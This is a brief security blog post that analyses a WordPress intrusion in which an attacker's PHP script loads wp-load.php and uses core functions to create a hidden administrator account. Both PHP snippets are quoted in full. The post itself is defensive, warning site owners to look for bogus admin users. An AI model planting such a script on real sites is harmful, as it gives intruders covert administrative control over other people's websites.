Attackers tend to get smarter in order to avoid detection, as well as gain access to your WordPress site. They use legit functions of the WordPress core to create users, post spammy content, and other kinds of malicious activities.
Most of the cases where legit functions are used, attackers avoid combining that with obfuscation techniques to reduce the chances of being detected by antivirus solutions and regular scanners.
One case that we recently researched was just like that. The attacker placed a PHP script inside the root directory of the WordPress installation and included the wp-load.php file that gave him access to the core functions.
$wp_load_loc = "wp-load.php"; require_once($wp_load_loc);
After loading the file, it is easy to create a WordPress user and set the role to administrator via the core functions.
$user_id = wp_create_user('username987', 'password987'); $user = new WP_User($user_id); $user->set_role('administrator');
Having the administrator role allows attackers unlimited possibilities to harm your site and business. They can lock you out from the backend, and if you aren’t logging in very often, nor performing any security checks, these bogus ‘Administrator’ users could go undetected for a long time.
If you’ve noticed any suspicious activity, or your website recently got blacklisted, this could be an indication that something may be wrong. We highly recommend contacting a professional to investigate the issues for you.